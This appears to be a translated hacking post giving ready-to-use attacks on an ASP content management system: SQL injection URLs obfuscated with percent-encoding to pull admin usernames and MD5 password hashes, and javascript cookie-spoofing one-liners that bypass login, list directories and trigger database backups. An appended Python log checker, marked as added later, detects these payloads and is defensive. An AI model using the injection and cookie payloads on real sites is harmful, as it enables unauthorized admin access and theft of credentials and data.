I. Injection

1. news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2

2. Step one: javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
Step two: request admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
This yields the username and the MD5-hashed password.
II. Cookie spoofing

1. Enter the admin backend directly. Applies to older versions; versions in which login.asp and admin_index.asp sit in the same directory generally have this flaw.
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"

2. Directory listing.
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."

3. Database backup (seems to apply to fewer versions).
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"

4. Getting into the backend when the MD5 password cannot be cracked:
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
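From the defender's side, an added example (written for this page, not from the original post or the CMS): a small Python log check that percent-decodes request parameters and cookie values before keyword matching, so the %41nd / %53elect / %46rom encoding, the dir=.. parameter and the 'or'='or' cookie values listed above are all caught. The sample requests and the label names are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample requests modelled on the post's payloads; not real log data.
SAMPLE_REQUESTS = [
    {"path": "/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3 %46rom %41dmin", "cookies": ""},
    {"path": "/admin_index.asp",
     "cookies": "adminuser=%27or%27%3D%27or%27; adminpass=%27or%27%3D%27or%27; admindj=1"},
    {"path": "/edit/admin_uploadfile.asp?dir=..", "cookies": "admindj=1"},
    {"path": "/news_more.asp?lm=2", "cookies": "ASPSESSIONIDQQ=abc123"},
]

# Keywords the post hides as %41nd / %53elect / %46rom; matched only after decoding.
SQLI_RE = re.compile(r"union\s+select|\bselect\b.*\bfrom\b|\band\s+1\s*=\s*[12]\b", re.I)
# The 'or'='or' value the post plants in the adminuser / adminpass cookies.
COOKIE_SQLI_RE = re.compile(r"'\s*or\s*'", re.I)

def normalize(value: str) -> str:
    """Percent-decode until stable (so %2541nd double encoding is caught too),
    then lowercase and collapse whitespace so the regexes see plain keywords."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value).lower()

def parse_cookies(header: str) -> dict:
    """Split a Cookie header into {name: normalized value}."""
    pairs = (p.strip().split("=", 1) for p in header.split(";") if "=" in p)
    return {k.strip(): normalize(v) for k, v in pairs}

def classify(req: dict) -> list:
    """Return the indicator labels triggered by one request (empty list if clean)."""
    findings = []
    _, _, query = req["path"].partition("?")
    values = [normalize(v) for vs in parse_qs(query, keep_blank_values=True).values() for v in vs]
    if any(SQLI_RE.search(v) for v in values):
        findings.append("sqli_in_query")
    if any(".." in v for v in values):  # dir=.. from the directory-listing trick above
        findings.append("traversal_in_query")
    if any(COOKIE_SQLI_RE.search(v) for v in parse_cookies(req["cookies"]).values()):
        findings.append("sqli_in_cookie")
    return findings

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["path"], "->", classify(req) or ["clean"])
```

Decoding before matching is the whole point: a filter that looks for the literal string "select" in the raw query string sees only "%53elect" and lets the request through.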